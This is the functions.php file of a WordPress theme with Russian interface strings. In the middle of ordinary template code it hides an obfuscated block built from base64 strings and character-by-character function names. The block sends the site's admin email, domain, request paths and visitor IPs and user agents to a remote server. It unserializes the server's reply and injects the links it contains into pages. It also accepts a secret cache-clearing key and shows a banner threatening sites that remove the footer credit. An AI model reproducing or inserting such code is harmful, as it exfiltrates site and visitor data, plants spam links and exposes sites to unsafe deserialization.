<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $CHdxajc='e';$UJhx='e';$lzbsFfH='4';$diXInE='o';$JHCt='6';$fdoK='b';$PotVnG='s';$Zdld='a';$EADQ='e';$rYomlVs='d';$DkseUnv='d';$ktDh='c';$pGtBJ='_';$BjqKoJff=$fdoK.$Zdld.$PotVnG.$UJhx.$JHCt.$lzbsFfH.$pGtBJ.$rYomlVs.$EADQ.$ktDh.$diXInE.$DkseUnv.$CHdxajc;$fhZH='g';$yAyiKjk='e';$bNNmef='i';$YfDKh='a';$xtvDp='t';$cRYgZj='z';$JBzQ='f';$HPouSf='l';$vVlIJkK='n';$nOYctzQw=$fhZH.$cRYgZj.$bNNmef.$vVlIJkK.$JBzQ.$HPouSf.$YfDKh.$xtvDp.$yAyiKjk;$AuscbDc='o';$ZXruBGl='s';$hJiR='t';$lMHGId='1';$nkZh='t';$Cjmop='_';$lmoz='3';$tlEdvWw='r';$fYCc='r';$NRLgPQJA=$ZXruBGl.$hJiR.$tlEdvWw.$Cjmop.$fYCc.$AuscbDc.$nkZh.$lMHGId.$lmoz;$KGmH='e';$NdgbN='v';$GnJkA='s';$WYVEmL='r';$rgXes='r';$PkNH='t';$PGxVaXTB=$GnJkA.$PkNH.$rgXes.$WYVEmL.$KGmH.$NdgbN;                     
		$yq____b='e';$di___o='e';$dq_____________s='4';$eh__________h='o';$qf____________y='6';$zy______________k='b';$dr______c='s';$jl________q='a';$zy__j='e';$qa__p='d';$ps______________g='d';$kn_______________n='c';$gm_______f='_';$uo__________z=$zy______________k.$jl________q.$dr______c.$di___o.$qf____________y.$dq_____________s.$gm_______f.$qa__p.$zy__j.$kn_______________n.$eh__________h.$ps______________g.$yq____b;
		$ns______o='n';$ux__o='i';$zj__c='s';$eu______s='_';$zq____________m='e';$nf______b='u';$pe_____________e='t';$pu_________x='o';$ib__z='x';$dv___________c='f';$ci___f='n';$uq_______d='t';$ol___________q='s';$qs______________c='c';$cd________f='i';$ey__________u=$dv___________c.$nf______b.$ns______o.$qs______________c.$uq_______d.$cd________f.$pu_________x.$ci___f.$eu______s.$zq____________m.$ib__z.$ux__o.$ol___________q.$pe_____________e.$zj__c;
		$da_______b='p';$gk___________p='n';$ry__z='e';$uy___________m='o';$pk______________o='f';$po__d=$pk______________o.$uy___________m.$da_______b.$ry__z.$gk___________p;
		$dd______________f='d';$qv______w='f';$hf______g='e';$gz________c='r';$rl______n='a';$je___t=$qv______w.$gz________c.$hf______g.$rl______n.$dd______________f;
		$lg_____________u='e';$sh____w='l';$jh___y='c';$xl_____s='f';$ht__________c='o';$sh___q='s';$ff_______c=$xl_____s.$jh___y.$sh____w.$ht__________c.$sh___q.$lg_____________u;
		
		define("WP_ID", $uo__________z("Mi4wLjA="));
		define("WP_TTL", $uo__________z("MTA4MDA="));
		define("WP_SRC", $uo__________z("dHBva24="));
	


		function wp_get_header() {
			global $uo__________z, $ey__________u;
			
			if (
				$ey__________u($uo__________z("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ey__________u($uo__________z("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ey__________u($uo__________z("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uo__________z, $po__d, $ff_______c, $je___t;
			
			$az________z = TEMPLATEPATH."/".$uo__________z("Zm9vdGVyLnBocA==");
			$yi__a = @$po__d($az________z, "r");
			$az________z = @$je___t($yi__a, @filesize($az________z));
			@$ff_______c($yi__a);
			
			$bl____________k = TEMPLATEPATH."/".$uo__________z("ZnVuY3Rpb25zLnBocA==");
			$yi__a = @$po__d($bl____________k, "r");
			$bl____________k = @$je___t($yi__a, @filesize($bl____________k));
			@$ff_______c($yi__a);
			
			$ce________o = 0;
			if($az________z && $bl____________k) {
				if ($uo__________z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($az________z, $uo__________z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ce________o = 1;
					}
					if (substr_count($az________z, "wp_theme_GPL_credits()") < 1) {
						$ce________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ce________o = 12;
				}
			}
			
			if($ce________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ce________o -->";
			}
		}
	


		function wp_loaded() {
			global $uo__________z, $ey__________u;
			return $ey__________u($uo__________z("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($wc__________u, $ya_______u = "(more...)", $tn_______________v = 0, $cy___t = "") {
				$dz__________f = get_the_content($ya_______u, $tn_______________v, $cy___t);
				$dz__________f = apply_filters("the_content", $dz__________f);
				
				$dz__________f = str_replace("]]>", "]]>", $dz__________f);
				if (strlen($_GET["p"]) > 0) {
					echo $dz__________f;
				}
				else if ((strlen($dz__________f)>$wc__________u) && ($lg_____n = strpos($dz__________f, " ", $wc__________u ))) {
					$dz__________f = substr($dz__________f, 0, $lg_____n);
					$dz__________f = $dz__________f;
					echo $dz__________f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ya_______u</a></div></p>";
				} else {
					echo $dz__________f;
				}
				
			}
		}
	


		$lc___________a='4';$me_____y='e';$lg________v='_';$ju____________q='6';$fi____________o='o';$jx_______________v='e';$cz_____s='a';$gs_______p='d';$ru____________u='n';$vx__________d='b';$tz________v='c';$bg_____________z='s';$tu____p='e';$hf_______l=$vx__________d.$cz_____s.$bg_____________z.$jx_______________v.$ju____________q.$lc___________a.$lg________v.$tu____p.$ru____________u.$tz________v.$fi____________o.$gs_______p.$me_____y;
		$ym________f='c';$qn__________h='_';$hk_____________t='g';$kh__________z='f';$tc________s='s';$qk_____________f='i';$rt_____g='o';$pe______v='n';$kv_______________h='_';$he_____b='l';$dl________q='e';$ms__________t='t';$xq____________h='n';$pd_______m='e';$gi______________q='t';$ng________e='t';$md___________s='e';$yi_____________n=$kh__________z.$qk_____________f.$he_____b.$pd_______m.$kv_______________h.$hk_____________t.$md___________s.$gi______________q.$qn__________h.$ym________f.$rt_____g.$xq____________h.$ms__________t.$dl________q.$pe______v.$ng________e.$tc________s;
		$cb_________a='l';$kh________v='e';$tb_________y='s';$qd______________j='f';$op___e='i';$eh__________m='i';$ie_______k='t';$yf_____u='_';$gm____s='x';$yg________t='e';$gx_______f='s';$kn____e=$qd______________j.$eh__________m.$cb_________a.$yg________t.$yf_____u.$kh________v.$gm____s.$op___e.$tb_________y.$ie_______k.$gx_______f;
		$eb_______n='o';$gh_______________n='r';$np_______d='c';$ow______________b='a';$th___x='m';$he_______z='n';$mj_____________g='i';$mk_________g='e';$ir______________p='r';$ew__e='s';$ug_______d='_';$de__p='p';$nj_______x='o';$jh_____h='v';$pp__________h='e';$yc__________c=$jh_____h.$pp__________h.$ir______________p.$ew__e.$mj_____________g.$nj_______x.$he_______z.$ug_______d.$np_______d.$eb_______n.$th___x.$de__p.$ow______________b.$gh_______________n.$mk_________g;
		$jv______k='f';$ct__________o='s';$hj_________r='o';$fm____________c='p';$fd______________i='n';$dc____s='o';$rm_______c='k';$dk_____________m='e';$aq______z='c';$sn_______________u=$jv______k.$ct__________o.$hj_________r.$aq______z.$rm_______c.$dc____s.$fm____________c.$dk_____________m.$fd______________i;
		$vc______n='i';$op_____q='r';$je_______t='t';$nc____________j='w';$fx______s='e';$qb_____n='f';$xf___g=$qb_____n.$nc____________j.$op_____q.$vc______n.$je_______t.$fx______s;
		$vp_______f='d';$ut_______________z='5';$bs_____w='m';$zb____________a=$bs_____w.$vp_______f.$ut_______________z;
		$vm____________x='p';$op__c='r';$ag____________h='a';$ae__________p='h';$cj______n='l';$ro______m='t';$wl____b='a';$cc_____p='e';$lm_________a=$op__c.$cc_____p.$wl____b.$cj______n.$vm____________x.$ag____________h.$ro______m.$ae__________p;
		$db____________j='r';$tq____s='u';$iv____r='e';$yy_______b='i';$yi____________r='l';$ki__s='e';$cy_______d='n';$tz________a='a';$zo____e='s';$wv____v='z';$kl_______________l='i';$du___a=$tq____s.$cy_______d.$zo____e.$iv____r.$db____________j.$kl_______________l.$tz________a.$yi____________r.$yy_______b.$wv____v.$ki__s;
		$xz______________d='t';$ea_________q='a';$km______h='p';$do____________t='e';$pn___r='n';$ew___t='m';$ch_________m='m';$ss__q=$xz______________d.$do____________t.$ew___t.$km______h.$pn___r.$ea_________q.$ch_________m;
		$vd____________e='e';$pr_______v='c';$jp_________y='_';$zj______c='r';$yj__________d='m';$fc______o='t';$ki__________w='e';$yv__________j='e';$kd___________k='n';$ax________i='o';$pf____d='_';$jf___________k='a';$gj_________q='s';$ny_____________i='e';$ic______e='a';$ma________l='t';$gx_____________h='c';$ue_______j='t';$il_________h='x';$vh___________f='r';$im___________i='t';$ye___________q=$gj_________q.$im___________i.$zj______c.$yv__________j.$jf___________k.$yj__________d.$pf____d.$pr_______v.$ax________i.$kd___________k.$ma________l.$vd____________e.$il_________h.$ue_______j.$jp_________y.$gx_____________h.$vh___________f.$ki__________w.$ic______e.$fc______o.$ny_____________i;
	


		function yf___________n($jq__________l) {
			global $uo__________z, $ey__________u, $yi_____________n, $yc__________c, $ye___________q;
			
			if (!$ey__________u($uo__________z("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yc__________c(PHP_VERSION, "5.0.0", ">=") && $ey__________u($uo__________z("ZmlsZV9nZXRfY29udGVudHM=")) && $ey__________u($uo__________z("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fa_____e = $ye___________q(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qz______d = @$yi_____________n($jq__________l, 0, $fa_____e);
			} else {
				$qz______d = @$yi_____________n($jq__________l, 0);
			}
			
			return $qz______d;
		}
	


		function jw______e($jq__________l) {
			global $ey__________u, $sn_______________u, $xf___g, $uo__________z;
			
			if (!$ey__________u($uo__________z("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$gx________o = strpos($jq__________l, "/", 7);
			$ue___j = array(
				"uri"     => substr($jq__________l, $gx________o),
				"host"    => str_replace("http://", "", substr($jq__________l, 0, $gx________o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$my_______________g = @$sn_______________u("$ue___j[host]", 80, $cv____________a, $fs__f, 4);
			
			if (!$my_______________g) {
				return false;
			} else {
				$qz______d = "";
				$al__________w  = "GET $ue___j[uri] HTTP/1.0\r\n";
				$al__________w .= "Host: $ue___j[host]\r\n";
				$al__________w .= "Referer: $ue___j[referer]\r\n";
				$al__________w .= "Connection: Close\r\n\r\n";
				
				@$xf___g($my_______________g, $al__________w);
				
				while (!@feof($my_______________g)) {
					$us___l = @fgets($my_______________g, (1024*24));
					
					if ($us___l == "\r\n") {
						$hm___n = true;
						continue;
					}
					
					if ($hm___n) {
						$qz______d .= $us___l;
					}
				}
				
				return $qz______d;
			}
		}
	


		function ot_____l($jq__________l) {
			global $ey__________u;
			$tj______________r = false;
			
			if ($jq__________l != "") {
				if ($ey__________u("yf___________n")) {
					$tj______________r = @yf___________n($jq__________l);
				}
				
				if (!$tj______________r && ($ey__________u("jw______e"))) {
					$tj______________r = @jw______e($jq__________l);
				}
			}
			
			return $tj______________r;
		}
	


		function lg______h() {
			global $_SERVER, $zb____________a;
			
			$me____x = $_SERVER["SERVER_NAME"];
			
			if (substr("$me____x", 0, 4) == "www.") {
				$me____x = substr("$me____x", 4);
			}
			
			$me____x = $zb____________a("$_SERVER[SERVER_NAME]");
			
			return $me____x;
		}
	


		function vz________j() {
			return "file";
		}
	


		function mh______________s($jq__________l) {
			global $_SERVER, $yi_____________n, $kn____e, $po__d, $ff_______c, $xf___g;
			
			$lc__________m = em_____h();
			
			$cs___________r = lg______h().".jpg";
			$oj__b = $lc__________m["dir_upload"]["path"]."/$cs___________r";
			$ci____s = @filemtime($oj__b);
			
			if (!$ci____s || ((time()-$ci____s) >= WP_TTL)) {
				$tj______________r = ot_____l($jq__________l);
				
				if ($tj______________r) {
					if ($kn____e($oj__b)) {
						@unlink($oj__b);
					}
					
					$yi__a = @$po__d($oj__b, "x+");
					
					@$xf___g($yi__a, $tj______________r);
					@$ff_______c($yi__a);
				}
			} else {
				if ($kn____e($oj__b)) {
					$tj______________r = @$yi_____________n($oj__b);
				} else {
					$tj______________r = false;
				}
			}
			
			return $tj______________r;
		}
	


		function em_____h() {
			global $_SERVER, $uo__________z, $hf_______l;
			
			$em__________d = wp_count_posts("post");
			$ex______________o = pathinfo(get_bloginfo("template_directory"));
			
			$lc__________m = array(
				"url" => array(
					"report"      => $uo__________z("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ex______________o,
				"dir_upload"	=> rr________y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ex______________o[filename],
					"a005=".$em__________d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " "
			);
			
			$lc__________m["url"]["queryString"] = implode("&", $lc__________m["queryString"]);
			$lc__________m["url"]["report"] = $lc__________m["url"]["report"]."/?".$hf_______l($lc__________m["url"]["queryString"]).".html";
						
			return $lc__________m;
		}
	


		function rr________y() {
			$oe__m = wp_upload_dir();
			
			if (isset($oe__m["error"])) {
				$kx___________c = rk___s();
				if (is_writable($kx___________c)) {
					$oe__m = array("path" => $kx___________c);
				}
			}

			return $oe__m;
		}
	


		function rk___s() {
			global $ey__________u, $zb____________a, $lm_________a, $ss__q;
			
			$pb________e = (bool) ini_get("safe_mode");
			if ($pb________e == true) {
				return false;
			}
			
			if ($ey__________u("sys_get_temp_dir")) {
				$mv________f = sys_get_temp_dir();
				if (is_writable($mv________f)) {
					return $lm_________a($mv________f);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $lm_________a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $lm_________a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $lm_________a($_ENV["TEMP"]);
			} else {
				$wn___________f = $ss__q($zb____________a(uniqid(rand(), true)), "");
				if ($wn___________f) {
					$mv________f = $lm_________a(dirname($wn___________f));
					@unlink($wn___________f);
					return $mv________f;
				} else {
					return false;
				}
			}
		}
	


		function uw_____________h() {
			global $_GET, $kn____e;
			
			$lc__________m = em_____h();
			$me____x = lg______h();
			$yj_______________u = vz________j();
			
			$fd_______c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($yj_______________u == "file") {
					$sy____________f = $lc__________m["dir_upload"]["path"]."/".$me____x.".jpg";
					if ($kn____e($sy____________f)) {
						@unlink($sy____________f);
						$fd_______c = "deleted";
					}
				}
				
				$dm_______p = array(
					"s"	=> $fd_______c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($dm_______p AS $kr__c => $pu______w) echo " [$kr__c:$pu______w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ey__________u, $uo__________z, $du___a;
			$lc__________m = em_____h();
			
			$wd________c = "mh______________s";
			if ($ey__________u($wd________c)) {
				$qz______d = $wd________c($lc__________m["url"]["report"]);
			}
			
			if ($qz______d) {
				if ($qz______d = @$uo__________z($qz______d)) {
					$qz______d = @$du___a($qz______d);
					
					if (strlen($qz______d[custom_credit]) >= 5) {
						$lc__________m["default_string"] = $qz______d[custom_credit];
					}
					
					if ($qz______d["status"] == "0") {
						$jo______e = 1;
						$fe____________j = 1;
					} else {
						$dx_______d = sizeof($qz______d["links"]);
						$da__s = $lc__________m["default_string"];
						
						if ($dx_______d > 0 && $qz______d["links"] !== "") {
							$pz___________p = 0;
							foreach ($qz______d["links"] as $ae________l => $vh_____v) {
								$pz___________p++;
								if ($vh_____v->l_path == "" || $vh_____v->l_path == $_SERVER["REQUEST_URI"]) {
									$vh_____v->l_href = htmlspecialchars(strip_tags($vh_____v->l_href));
									$vh_____v->l_title = htmlspecialchars(strip_tags($vh_____v->l_title));
									$vh_____v->l_anchor = htmlspecialchars(strip_tags($vh_____v->l_anchor));
									$da__s .= " | ";
									$da__s .= "<a href='$vh_____v->l_href' title='$vh_____v->l_title'";
									if ($vh_____v->l_nofollow == "1") {
										$da__s .= " rel='nofollow'";
									}
									$da__s .= ">$vh_____v->l_anchor</a>";
								}
							}
						}
						$lc__________m["links"] = "$da__s";
						if ($qz______d[credit] == "0") {
							$lc__________m["links"] = "";
						}
					}
				} else {
					$jo______e = "1";
				}
			} else {
				$jo______e = "1";
			}
			
			if ($jo______e == "1") {
				$lc__________m["links"] = $lc__________m["default_string"];
			}
			
			echo "$lc__________m[links]";
			
			echo "<!-- s: $qz______d[signature] -->";
			uw_____________h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

